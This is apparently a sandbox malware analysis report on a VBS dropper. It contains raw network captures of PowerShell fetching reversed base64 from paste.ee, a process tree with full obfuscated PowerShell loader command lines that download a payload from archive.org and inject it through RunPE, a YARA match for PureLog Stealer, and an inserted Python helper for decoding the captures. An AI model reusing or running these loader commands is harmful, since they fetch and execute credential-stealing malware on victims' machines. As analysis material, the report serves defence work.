                                      2024-09-26 08:58:04 UTC16384INData Raw: 41 44 41 6e 74 45 41 67 41 4b 2f 67 51 4c 42 7a 6b 67 41 41 41 41 41 41 4a 37 52 51 49 41 43 67 4d 43 65 30 55 43 41 41 6f 44 46 31 67 43 65 30 51 43 41 41 6f 44 57 53 6a 51 41 51 41 4b 41 41 41 43 65 30 55 43 41 41 6f 44 42 4b 51 31 41 41 41 62 41 67 4a 37 52 41 49 41 43 68 64 59 66 55 51 43 41 41 6f 71 41 41 41 54 4d 41 4d 41 54 77 41 41 41 41 4d 42 41 42 45 41 41 6e 74 45 41 67 41 4b 43 6a 67 75 41 41 41 41 41 41 59 58 57 51 6f 43 65 30 55 43 41 41 6f 47 6f 7a 55 41 41 42 75 4d 4e 51 41 41 47 77 4f 4d 4e 51 41 41 47 2f 34 42 43 77 63 35 43 41 41 41 41 41 41 47 44 44 67 54 41 41 41 41 41 41 59 57 2f 67 49 4e 43 54 72 48 2f 2f 2f 2f 46 51 77 34 41 41 41 41 41 41 67 71 41 42 4d 77 41 77 41 74 41 41 41 41 62 41 41 41 45 51 41 43 41 79 6a 47 41 51 41 4b 43
                                      Data Ascii: ADAntEAgAK/gQLBzkgAAAAAAJ7RQIACgMCe0UCAAoDF1gCe0QCAAoDWSjQAQAKAAACe0UCAAoDBKQ1AAAbAgJ7RAIAChdYfUQCAAoqAAATMAMATwAAAAMBABEAAntEAgAKCjguAAAAAAYXWQoCe0UCAAoGozUAABuMNQAAGwOMNQAAG/4BCwc5CAAAAAAGDDgTAAAAAAYW/gINCTrH////FQw4AAAAAAgqABMwAwAtAAAAbAAAEQACAyjGAQAKC


                                      Session ID: 1
                                      Source IP: 192.168.2.6
                                      Source Port: 49712
                                      Destination IP: 188.114.97.34
                                      Destination Port: 443
                                      PID: 6784
                                      Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-09-26 08:58:06 UTC | 67 | OUT | GET /d/WksSo/0 HTTP/1.1
                                      Host: paste.ee
                                      Connection: Keep-Alive
                                      2024-09-26 08:58:07 UTC | 1208 | IN | HTTP/1.1 200 OK
                                      Date: Thu, 26 Sep 2024 08:58:07 GMT
                                      Content-Type: text/plain; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Cache-Control: max-age=2592000
                                      strict-transport-security: max-age=63072000
                                      x-frame-options: DENY
                                      x-content-type-options: nosniff
                                      x-xss-protection: 1; mode=block
                                      content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZFeGSdcjcWLSbBQfAYs2wOzwbUehwS28Cp4gkumWgydo2MaMxadPSMUBZP%2B7vft9Cmy5pLADsbfvUFiuOe0U%2FNM%2FG2BLKmJo9ynpFr6Fi%2BXUpGqQAT8%2FX9dPtg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8c920ce138a35e82-EWR
                                      2024-09-26 08:58:07 UTC161INData Raw: 31 66 37 66 0d 0a 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 50 6f 79 44 69 38 77 47 50 4d 78 44 4c 38 67 77 4f 38 76 44 33 37 41 37 4f 55 75 44 64 37 51 31 4f 77 73 44 45 36 77 75 4f 4d 72 44 72 36 77 6f 4f 73 70 44 52 36 67 69 4f 51 6f 44 43 36 51 67 4f 41 6b 44 2f 35 67 66 4f 30 6e 44 6f 7a 51 7a
                                      Data Ascii: 1f7f==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPoyDi8wGPMxDL8gwO8vD37A7OUuDd7Q1OwsDE6wuOMrDr6woOspDR6giOQoDC6QgOAkD/5gfO0nDozQz
                                      2024-09-26 08:58:07 UTC1369INData Raw: 4d 77 49 44 70 79 41 71 4d 45 4b 44 67 79 77 6e 4d 77 4a 44 57 79 67 6b 4d 34 49 44 4b 79 67 52 4d 6f 48 44 32 78 51 64 4d 51 48 44 7a 78 67 63 4d 45 48 44 77 78 77 62 4d 34 47 44 72 78 67 61 4d 6b 47 44 6f 78 77 5a 4d 59 47 44 6c 78 41 5a 4d 4d 47 44 69 78 67 58 4d 30 46 44 63 41 41 41 41 4d 43 77 42 51 41 41 41 41 34 44 70 2b 41 70 50 49 36 44 64 2b 77 6d 50 6b 35 44 58 2b 67 6c 50 51 35 44 50 2b 51 6a 50 67 34 44 47 2b 41 68 50 49 34 44 42 2b 41 51 50 38 33 44 2b 39 41 66 50 73 33 44 35 39 41 64 50 49 33 44 74 39 77 61 50 6b 32 44 6e 39 67 58 50 77 31 44 61 39 51 57 50 49 31 44 4b 39 51 53 50 49 77 44 36 38 67 4d 50 6f 79 44 69 38 67 47 50 49 78 44 4b 38 67 77 4f 6f 76 44 79 37 67 36 4f 49 75 44 61 37 67 30 4f 6f 73 44 43 36 67 75 4f 49 72 44 71 36 67
                                      Data Ascii: MwIDpyAqMEKDgywnMwJDWygkM4IDKygRMoHD2xQdMQHDzxgcMEHDwxwbM4GDrxgaMkGDoxwZMYGDlxAZMMGDixgXM0FDcAAAAMCwBQAAAA4Dp+ApPI6Dd+wmPk5DX+glPQ5DP+QjPg4DG+AhPI4DB+AQP83D+9AfPs3D59AdPI3Dt9waPk2Dn9gXPw1Da9QWPI1DK9QSPIwD68gMPoyDi8gGPIxDK8gwOovDy7g6OIuDa7g0OosDC6guOIrDq6g
                                      2024-09-26 08:58:07 UTC1369INData Raw: 47 41 48 41 7a 67 34 4d 41 4f 44 65 7a 41 33 4d 6f 4e 44 59 7a 67 31 4d 51 4e 44 53 7a 41 30 4d 34 4d 44 4d 7a 67 79 4d 67 4d 44 47 7a 41 78 4d 49 4d 44 41 79 67 76 4d 77 4c 44 36 79 41 75 4d 59 4c 44 30 79 67 73 4d 41 4c 44 75 79 41 72 4d 6f 4b 44 6f 79 67 70 4d 51 4b 44 69 79 41 6f 4d 34 4a 44 63 79 67 6d 4d 67 4a 44 57 79 41 6c 4d 49 4a 44 51 79 67 6a 4d 77 49 44 4b 79 41 69 4d 59 49 44 45 79 67 67 4d 41 45 44 2b 78 41 66 4d 6f 48 44 34 78 67 64 4d 51 48 44 79 78 41 63 4d 34 47 44 73 78 67 61 4d 67 47 44 6d 78 41 5a 4d 49 47 44 67 78 67 58 4d 77 46 44 61 78 41 57 4d 59 46 44 55 78 67 55 4d 41 46 44 4f 78 41 54 4d 6f 45 44 49 78 67 52 4d 51 45 44 43 78 41 41 4d 34 44 44 38 77 67 4f 4d 67 44 44 32 77 41 4e 4d 49 44 44 77 77 67 4c 4d 77 43 44 71 77 41 4b
                                      Data Ascii: GAHAzg4MAODezA3MoNDYzg1MQNDSzA0M4MDMzgyMgMDGzAxMIMDAygvMwLD6yAuMYLD0ygsMALDuyArMoKDoygpMQKDiyAoM4JDcygmMgJDWyAlMIJDQygjMwIDKyAiMYIDEyggMAED+xAfMoHD4xgdMQHDyxAcM4GDsxgaMgGDmxAZMIGDgxgXMwFDaxAWMYFDUxgUMAFDOxATMoEDIxgRMQEDCxAAM4DD8wgOMgDD2wANMIDDwwgLMwCDqwAK
                                      2024-09-26 08:58:07 UTC1369INData Raw: 49 44 49 79 51 68 4d 49 45 44 2f 78 41 66 4d 6b 48 44 32 78 77 63 4d 41 48 44 74 78 67 61 4d 63 47 44 6b 78 51 59 4d 34 46 44 62 78 41 57 4d 55 46 44 53 78 77 54 4d 77 45 44 4a 78 67 52 4d 4d 45 44 41 77 51 50 4d 6f 44 44 33 77 41 4e 4d 45 44 44 75 77 77 4b 4d 67 43 44 6c 77 67 49 4d 38 42 44 63 77 51 47 4d 59 42 44 54 77 41 45 4d 30 41 44 4b 77 77 42 4d 51 41 44 42 41 41 77 41 34 42 67 42 41 41 41 41 41 38 44 2b 2f 77 2b 50 67 2f 44 31 2f 67 38 50 38 2b 44 73 2f 51 36 50 59 2b 44 6a 2f 41 34 50 30 39 44 61 2f 77 31 50 51 39 44 52 2f 67 7a 50 73 38 44 49 31 51 62 4e 77 57 44 72 31 67 4b 4e 47 52 6a 51 30 34 44 4e 36 41 41 41 41 41 45 41 46 41 50 41 41 41 41 50 38 79 44 75 38 51 4c 50 77 79 44 72 38 67 4b 50 6b 79 44 6f 38 77 4a 50 59 79 44 6c 38 41 4a 50
                                      Data Ascii: IDIyQhMIED/xAfMkHD2xwcMAHDtxgaMcGDkxQYM4FDbxAWMUFDSxwTMwEDJxgRMMEDAwQPMoDD3wANMEDDuwwKMgCDlwgIM8BDcwQGMYBDTwAEM0ADKwwBMQADBAAwA4BgBAAAAA8D+/w+Pg/D1/g8P8+Ds/Q6PY+Dj/A4P09Da/w1PQ9DR/gzPs8DI1QbNwWDr1gKNGRjQ04DN6AAAAAEAFAPAAAAP8yDu8QLPwyDr8gKPkyDo8wJPYyDl8AJP
                                      2024-09-26 08:58:07 UTC1369INData Raw: 44 77 77 67 4c 4d 77 43 44 71 77 41 4b 4d 59 43 44 6b 77 67 49 4d 41 43 44 65 77 41 48 4d 6f 42 44 59 77 67 46 4d 51 42 44 53 77 41 45 4d 34 41 44 4d 77 67 43 4d 67 41 44 47 77 41 42 4d 49 41 44 41 41 41 51 41 38 42 51 42 77 43 77 50 34 2f 44 38 2f 67 2b 50 67 2f 44 32 2f 41 39 50 49 2f 44 77 2f 67 37 50 77 2b 44 71 2f 41 36 50 59 2b 44 6b 2f 67 34 50 41 2b 44 65 2f 41 33 50 6f 39 44 59 2f 67 31 50 51 39 44 53 2f 41 30 50 34 38 44 4d 2f 67 79 50 67 38 44 47 2f 41 78 50 49 38 44 41 2b 67 76 50 77 37 44 36 2b 41 75 50 59 37 44 30 2b 67 73 50 41 37 44 75 2b 41 72 50 6f 36 44 70 2b 77 70 50 55 36 44 6a 2b 51 6f 50 38 35 44 64 2b 77 6d 50 6b 35 44 58 2b 51 6c 50 4d 35 44 52 2b 77 6a 50 30 34 44 4c 2b 51 69 50 63 34 44 46 2b 77 67 50 45 30 44 2f 39 51 66 50 73
                                      Data Ascii: DwwgLMwCDqwAKMYCDkwgIMACDewAHMoBDYwgFMQBDSwAEM4ADMwgCMgADGwABMIADAAAQA8BQBwCwP4/D8/g+Pg/D2/A9PI/Dw/g7Pw+Dq/A6PY+Dk/g4PA+De/A3Po9DY/g1PQ9DS/A0P48DM/gyPg8DG/AxPI8DA+gvPw7D6+AuPY7D0+gsPA7Du+ArPo6Dp+wpPU6Dj+QoP85Dd+wmPk5DX+QlPM5DR+wjP04DL+QiPc4DF+wgPE0D/9QfPs
                                      2024-09-26 08:58:07 UTC1369INData Raw: 66 31 67 58 4e 30 56 44 63 31 77 57 4e 6f 56 44 5a 31 41 57 4e 63 56 44 57 31 51 56 4e 51 56 44 54 31 67 55 4e 45 56 44 51 31 77 54 4e 34 55 44 4e 31 41 54 4e 73 55 44 4b 31 51 53 4e 67 55 44 48 31 67 52 4e 55 55 44 45 31 77 51 4e 49 55 44 42 30 77 50 41 41 45 41 63 41 55 41 6b 41 45 44 62 78 49 57 4d 59 46 6a 54 78 51 55 4d 36 45 44 4d 78 59 53 4d 63 45 6a 45 78 67 41 4d 2b 44 44 39 77 6f 4f 4d 67 44 6a 31 77 77 4d 4d 43 44 44 75 77 34 4b 4d 6b 43 6a 6d 77 41 4a 4d 47 43 44 66 77 49 48 4d 6a 42 54 57 77 38 45 4d 46 42 7a 4f 77 45 44 4d 6e 41 54 48 77 4d 42 4d 4a 41 41 41 41 41 46 41 46 41 49 41 2f 38 2f 50 31 2f 7a 36 2f 45 2b 50 58 2f 7a 77 2f 6b 37 50 76 2b 54 70 2f 6b 35 50 4f 2b 44 68 2f 6f 33 50 77 39 6a 5a 2f 77 31 50 53 39 44 53 2f 34 7a 50 79 38
                                      Data Ascii: f1gXN0VDc1wWNoVDZ1AWNcVDW1QVNQVDT1gUNEVDQ1wTN4UDN1ATNsUDK1QSNgUDH1gRNUUDE1wQNIUDB0wPAAEAcAUAkAEDbxIWMYFjTxQUM6EDMxYSMcEjExgAM+DD9woOMgDj1wwMMCDDuw4KMkCjmwAJMGCDfwIHMjBTWw8EMFBzOwEDMnATHwMBMJAAAAAFAFAIA/8/P1/z6/E+PX/zw/k7Pv+Tp/k5PO+Dh/o3Pw9jZ/w1PS9DS/4zPy8
                                      2024-09-26 08:58:07 UTC1065INData Raw: 30 77 49 4e 34 52 44 62 30 4d 79 4d 6a 50 44 30 7a 34 36 4d 49 4f 54 5a 7a 77 78 4d 58 4d 54 45 7a 77 67 4d 61 4c 7a 6a 79 67 6d 4d 30 45 6a 6f 78 38 59 4d 5a 46 6a 49 77 30 4f 4d 6b 44 6a 31 77 45 4d 4d 52 43 6a 65 77 38 47 4d 62 42 44 55 77 73 45 4d 71 41 41 41 41 77 4b 41 45 41 50 41 2f 30 66 50 72 33 44 30 39 67 5a 50 41 31 44 4d 39 59 53 50 5a 30 7a 44 39 41 41 50 6d 7a 7a 33 38 67 4e 50 52 7a 6a 6e 38 6b 49 50 45 79 7a 63 38 6b 47 50 4c 78 7a 4c 38 30 42 50 4c 73 44 2f 37 49 6f 4f 35 70 6a 55 35 63 65 4f 41 6e 7a 47 32 49 6c 4e 7a 55 54 78 31 6f 57 4e 4a 51 54 50 30 41 44 4e 6f 4d 7a 2b 79 55 73 4d 43 4b 54 59 79 6b 6c 4d 42 4a 54 4c 78 41 57 4d 78 41 54 77 77 59 48 4d 75 42 41 41 41 77 47 41 45 41 4f 41 2f 49 2f 50 72 2f 7a 71 2f 77 30 50 66 34 44
                                      Data Ascii: 0wIN4RDb0MyMjPD0z46MIOTZzwxMXMTEzwgMaLzjygmM0Ejox8YMZFjIw0OMkDj1wEMMRCjew8GMbBDUwsEMqAAAAwKAEAPA/0fPr3D09gZPA1DM9YSPZ0zD9AAPmzz38gNPRzjn8kIPEyzc8kGPLxzL80BPLsD/7IoO5pjU5ceOAnzG2IlNzUTx1oWNJQTP0ADNoMz+yUsMCKTYyklMBJTLxAWMxATwwYHMuBAAAwGAEAOA/I/Pr/zq/w0Pf4D
                                      2024-09-26 08:58:07 UTC1369INData Raw: 32 30 30 30 0d 0a 76 77 51 4c 4d 31 42 54 62 77 77 43 4d 68 41 41 41 41 77 4a 41 45 41 4a 41 41 41 77 50 4f 2f 44 79 2f 45 32 50 5a 39 7a 53 2f 4d 30 50 36 38 54 4d 2f 6b 79 50 68 38 54 47 2f 34 67 50 38 37 44 39 2b 67 75 50 67 37 7a 31 2b 34 73 50 47 37 6a 76 2b 59 72 50 75 36 54 6f 2b 55 70 50 4e 36 7a 54 2b 4d 53 50 33 33 44 30 39 6f 63 50 45 33 6a 76 39 59 62 50 79 32 7a 70 39 67 5a 50 4d 32 7a 65 39 38 57 50 64 31 54 4f 39 6f 53 50 63 77 6a 2b 38 55 50 50 77 7a 44 33 38 45 4e 50 38 79 7a 72 38 51 4b 50 31 78 7a 56 38 49 46 50 4e 78 6a 51 38 59 43 50 43 73 7a 7a 37 6f 38 4f 46 76 6a 75 37 6b 34 4f 6c 74 44 59 37 73 31 4f 51 74 44 4e 37 30 78 4f 43 6f 54 2f 36 67 76 4f 74 72 54 30 36 45 73 4f 67 71 7a 6d 36 59 70 4f 4c 71 54 61 36 63 6c 4f 35 6f 44 4e
                                      Data Ascii: 2000vwQLM1BTbwwCMhAAAAwJAEAJAAAwPO/Dy/E2PZ9zS/M0P68TM/kyPh8TG/4gP87D9+guPg7z1+4sPG7jv+YrPu6To+UpPN6zT+MSP33D09ocPE3jv9YbPy2zp9gZPM2ze98WPd1TO9oSPcwj+8UPPwzD38ENP8yzr8QKP1xzV8IFPNxjQ8YCPCszz7o8OFvju7k4OltDY7s1OQtDN70xOCoT/6gvOtrT06EsOgqzm6YpOLqTa6clO5oDN
                                      2024-09-26 08:58:07 UTC1369INData Raw: 59 4e 7a 56 54 47 30 59 38 4d 35 4b 7a 32 79 67 72 4d 49 47 7a 64 41 41 41 41 59 42 41 42 67 41 77 4f 54 63 54 78 33 67 36 4e 57 5a 44 38 31 67 64 4e 62 51 6a 34 30 77 4c 4e 41 4f 7a 6f 79 45 72 4d 41 47 6a 34 78 30 5a 4d 71 46 44 47 77 73 4f 4d 2b 43 44 44 41 41 41 41 77 41 41 42 51 41 41 41 41 38 7a 56 2f 63 53 50 5a 33 6a 6b 39 63 54 50 70 6f 54 38 36 55 43 4f 35 6a 54 61 34 4d 45 4f 6d 63 44 4e 32 34 55 4e 6e 58 44 31 31 45 61 4e 78 4a 7a 31 79 59 70 4d 31 4a 54 55 79 6f 6b 4d 46 46 54 31 78 6b 42 4d 4b 42 41 41 41 41 45 41 45 41 41 41 2f 59 35 50 52 2b 6a 63 2b 59 6e 50 56 35 54 4d 2b 6f 69 50 6c 30 44 75 38 77 4d 50 63 6d 44 51 35 59 6a 4d 33 4b 44 45 77 41 4f 4d 36 43 54 6e 41 41 41 41 73 41 77 41 77 44 41 41 41 38 7a 35 2f 73 38 50 79 39 44 57 35
                                      Data Ascii: YNzVTG0Y8M5Kz2ygrMIGzdAAAAYBABgAwOTcTx3g6NWZD81gdNbQj40wLNAOzoyErMAGj4x0ZMqFDGwsOM+CDDAAAAwAABQAAAA8zV/cSPZ3jk9cTPpoT86UCO5jTa4MEOmcDN24UNnXD11EaNxJz1yYpM1JTUyokMFFT1xkBMKBAAAAEAEAAA/Y5PR+jc+YnPV5TM+oiPl0Du8wMPcmDQ5YjM3KDEwAOM6CTnAAAAsAwAwDAAA8z5/s8Py9DW5
                                      2024-09-26 08:58:07 UTC1369INData Raw: 4d 76 41 54 4b 77 4d 43 4d 64 41 44 47 77 49 42 4d 4d 41 6a 42 77 45 41 41 41 45 41 47 41 4d 41 59 41 41 41 41 2f 73 2f 50 31 2f 7a 37 2f 6f 2b 50 6b 2f 6a 33 2f 67 39 50 54 2f 54 7a 2f 59 38 50 42 2f 44 76 2f 59 37 50 77 2b 6a 71 2f 55 36 50 66 2b 54 6d 2f 4d 35 50 4f 2b 44 69 2f 49 34 50 38 39 7a 64 2f 45 33 50 72 39 54 5a 2f 41 32 50 61 39 44 56 2f 34 30 50 4a 39 7a 51 2f 30 7a 50 33 38 6a 4d 2f 77 79 50 6d 38 44 49 2f 73 78 50 56 38 7a 44 2f 6b 77 50 45 34 6a 2f 2b 67 76 50 79 37 54 37 2b 63 75 50 68 37 7a 32 2b 59 74 50 51 37 6a 79 2b 51 73 50 2f 36 54 75 2b 4d 72 50 74 36 44 71 2b 49 71 50 63 36 6a 6c 2b 45 70 50 4c 36 54 68 2b 38 6e 50 36 35 44 64 2b 30 6d 50 6d 35 44 59 39 73 66 50 55 77 44 69 38 51 45 50 33 77 44 4d 38 6f 43 50 6b 77 7a 45 37 59
                                      Data Ascii: MvATKwMCMdADGwIBMMAjBwEAAAEAGAMAYAAAA/s/P1/z7/o+Pk/j3/g9PT/Tz/Y8PB/Dv/Y7Pw+jq/U6Pf+Tm/M5PO+Di/I4P89zd/E3Pr9TZ/A2Pa9DV/40PJ9zQ/0zP38jM/wyPm8DI/sxPV8zD/kwPE4j/+gvPy7T7+cuPh7z2+YtPQ7jy+QsP/6Tu+MrPt6Dq+IqPc6jl+EpPL6Th+8nP65Dd+0mPm5DY9sfPUwDi8QEP3wDM8oCPkwzE7Y
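Two things in the paste.ee exchange above are worth reading off the raw bytes rather than the ASCII column. The response is sent with Transfer-Encoding: chunked, so the body starts with a chunk-size line: the first IN row begins "1f7f" (0x1f7f = 8063 bytes), and the IN rows up to the 1065-byte one add up to 161 + 5 x 1369 + 1065 = 8071 = 6 (size line and CRLF) + 8063 + 2 (trailing CRLF), which is why the next 1369-byte row opens with the second size line "2000". The chunk payload itself begins with "==" followed by a long run of "A"; base64 permits "=" padding only at the end of a string, so a body that starts with it is base64 that was stored backwards (the loader's first VAI() argument, the paste.ee URL, is written backwards in the same way). The block below is an added example, not part of the Joe Sandbox report: it rebuilds a byte stream from "Data Raw" rows in the report's own format, de-chunks it while tolerating a capture that stops mid-chunk, and classifies the body. The sample row is constructed to mirror the first 161-byte IN row above; the run of 0x41 bytes is written as a multiplication (73, the count that makes the row 161 bytes as the report records it).

```python
import re

# Constructed sample mirroring the first 161-byte IN row of the paste.ee response above:
# chunk-size line "1f7f", CRLF, then a body opening with "==" and a run of "A". The real
# chunk is 8063 bytes, so only a prefix is present and the parser must handle truncation.
ROW1 = ("2024-09-26 08:58:07 UTC161INData Raw: "
        "31 66 37 66 0d 0a 3d 3d " + "41 " * 73 +
        "50 6f 79 44 69 38 77 47 50 4d 78 44 4c 38 67 77 4f 38 76 44 33 37 41 37 "
        "4f 55 75 44 64 37 51 31 4f 77 73 44 45 36 77 75 4f 4d 72 44 72 36 77 6f "
        "4f 73 70 44 52 36 67 69 4f 51 6f 44 43 36 51 67 4f 41 6b 44 2f 35 67 66 "
        "4f 30 6e 44 6f 7a 51 7a")

BASE64_TEXT = re.compile(rb"^[A-Za-z0-9+/]+=*$")


def rows_to_bytes(rows):
    """Concatenate the hex of Joe Sandbox 'Data Raw' rows (in capture order) into one byte string."""
    out = bytearray()
    for row in rows:
        hexpart = row.split("Data Raw:", 1)[-1]
        out += bytes.fromhex(hexpart.replace(" ", ""))
    return bytes(out)


def dechunk(stream):
    """Decode an HTTP/1.1 chunked body.

    Returns (body, chunks) where chunks is a list of (declared_size, captured_size);
    a capture that ends inside a chunk yields captured_size < declared_size.
    """
    body, chunks, pos = bytearray(), [], 0
    while True:
        nl = stream.find(b"\r\n", pos)
        if nl < 0:
            break                      # no complete size line left
        size_field = stream[pos:nl].split(b";")[0].strip()   # drop chunk extensions
        try:
            size = int(size_field.decode("ascii"), 16)
        except ValueError:
            break
        if size == 0:
            break                      # last-chunk marker
        data = stream[nl + 2:nl + 2 + size]
        body += data
        chunks.append((size, len(data)))
        if len(data) < size:
            break                      # truncated capture
        pos = nl + 2 + size + 2        # skip the CRLF that terminates the chunk data
    return bytes(body), chunks


def classify_body(body):
    """'=' padding is only legal at the end of base64; if it leads, the text is stored reversed."""
    text = body.strip()
    if text.startswith(b"=") and BASE64_TEXT.match(text[::-1]):
        return "reversed-base64"
    if BASE64_TEXT.match(text):
        return "base64"
    return "unknown"


def analyze_rows(rows):
    """Summarise what the captured rows say about the downloaded payload."""
    body, chunks = dechunk(rows_to_bytes(rows))
    return {
        "declared_first_chunk": chunks[0][0] if chunks else None,
        "captured_body_bytes": len(body),
        "truncated": any(got < size for size, got in chunks),
        "encoding": classify_body(body),
        "preview": body[:24].decode("ascii", "replace"),
    }


if __name__ == "__main__":
    print(analyze_rows([ROW1]))
```

Feed every IN row of the session to analyze_rows to get the full body; with only the prefix shown here the result reports 8063 bytes declared, 155 captured and the reversed-base64 classification. Note that the captured prefix is the end of the original base64 text, so the trailing "AAAA..." of the original is what appears first here; the head of the decoded file is not recoverable from a truncated capture.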



                                      Target ID:0
                                      Start time:04:57:58
                                      Start date:26/09/2024
                                      Path:C:\Windows\System32\wscript.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs"
                                      Imagebase:0x7ff6303a0000
                                      File size:170'496 bytes
                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:2
                                      Start time:04:57:59
                                      Start date:26/09/2024
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoKGdldC1WQVJJQWJMZSAnKk1EcionKS5OYU1lWzMsMTEsMl0tSm9JbicnKSAoKCgnazgnKydmdScrJ3InKydsID0gYzlJaHR0cHM6Ly9pYScrJzYwMDEwMC51cy4nKydhJysncmNoaXZlJysnLm9yZy8yNC9pdGVtcy9kZXRhaC1ub3RlLXYvRGV0YScrJ2hOb3RlVi50eHRjJysnOUk7azhmYicrJ2FzJysnZTY0Q29udCcrJ2VudCA9ICcrJyhOJysnZXctTycrJ2JqZWN0JysnIFN5c3RlbScrJy5OZXQuV2ViQ2xpZW50KS4nKydEb3dubG9hZCcrJ1N0JysncmluJysnZyhrOGZ1cmwpJysnO2snKyc4ZmJpbmEnKydyeUMnKydvbnRlbnQgPScrJyBbJysnU3knKydzdGVtLkMnKydvbnYnKydlJysncnRdOicrJzpGcm9tQmFzZScrJzY0U3RyaW5nKGs4ZmJhc2U2NEMnKydvbnQnKydlbnQnKycpO2s4ZmFzc2VtYmx5ID0gWycrJ1JlZmxlY3Rpb24uQXNzZW1ibHldJysnOjonKydMb2FkKCcrJ2s4ZicrJ2JpbmFyeUNvbnQnKydlbnQpO2s4ZicrJ3R5cGUgJysnPScrJyBrOGZhc3NlbScrJ2JsJysneS4nKydHZXRUeXAnKydlJysnKGM5JysnSVJ1blBFLkgnKydvbWVjOUkpOycrJ2s4ZicrJ21ldGhvZCA9ICcrJ2snKyc4ZnR5cGUnKycuR2V0TWV0JysnaG9kKGM5SVZBSWM5SSk7JysnazhmbWV0aG9kLkludicrJ29rZShrOGZudWxsLCcrJyBbb2InKydqZScrJ2N0W11dQChjOUkwL29Tc2tXL2QvZWUuJysnZScrJ3RzYXAvLycrJzpzcHR0aGM5SSAsJysnIGM5JysnSWQnKydlcycrJ2F0aXYnKydhZCcrJ29jOUknKycgJysnLCBjOUknKydkZXNhdGknKyd2YWRvYzknKydJICwgYzknKydJZGVzJysnYXRpdmFkb2M5SSxjJysnOUlBZGRJblByb2Nlc3MzMmM5SSxjOUljOUkpJysnKScpICAtY1JFcGxBQ0UgKFtDSGFSXTk5K1tDSGFSXTU3K1tDSGFSXTczKSxbQ0hhUl0zOSAgLXJFcExBY0UnazhmJyxbQ0hhUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                      Imagebase:0x7ff6e3d50000
                                      File size:452'608 bytes
                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:3
                                      Start time:04:57:59
                                      Start date:26/09/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff66e660000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      Target ID:4
                                      Start time:04:58:01
                                      Start date:26/09/2024
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ((get-VARIAbLe '*MDr*').NaMe[3,11,2]-JoIn'') ((('k8'+'fu'+'r'+'l = c9Ihttps://ia'+'600100.us.'+'a'+'rchive'+'.org/24/items/detah-note-v/Deta'+'hNoteV.txtc'+'9I;k8fb'+'as'+'e64Cont'+'ent = '+'(N'+'ew-O'+'bject'+' System'+'.Net.WebClient).'+'Download'+'St'+'rin'+'g(k8furl)'+';k'+'8fbina'+'ryC'+'ontent ='+' ['+'Sy'+'stem.C'+'onv'+'e'+'rt]:'+':FromBase'+'64String(k8fbase64C'+'ont'+'ent'+');k8fassembly = ['+'Reflection.Assembly]'+'::'+'Load('+'k8f'+'binaryCont'+'ent);k8f'+'type '+'='+' k8fassem'+'bl'+'y.'+'GetTyp'+'e'+'(c9'+'IRunPE.H'+'omec9I);'+'k8f'+'method = '+'k'+'8ftype'+'.GetMet'+'hod(c9IVAIc9I);'+'k8fmethod.Inv'+'oke(k8fnull,'+' [ob'+'je'+'ct[]]@(c9I0/oSskW/d/ee.'+'e'+'tsap//'+':sptthc9I ,'+' c9'+'Id'+'es'+'ativ'+'ad'+'oc9I'+' '+', c9I'+'desati'+'vadoc9'+'I , c9'+'Ides'+'ativadoc9I,c'+'9IAddInProcess32c9I,c9Ic9I)'+')') -cREplACE ([CHaR]99+[CHaR]57+[CHaR]73),[CHaR]39 -rEpLAcE'k8f',[CHaR]36) )"
                                      Imagebase:0x7ff6e3d50000
                                      File size:452'608 bytes
                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.2295468999.000001B0A7DC0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
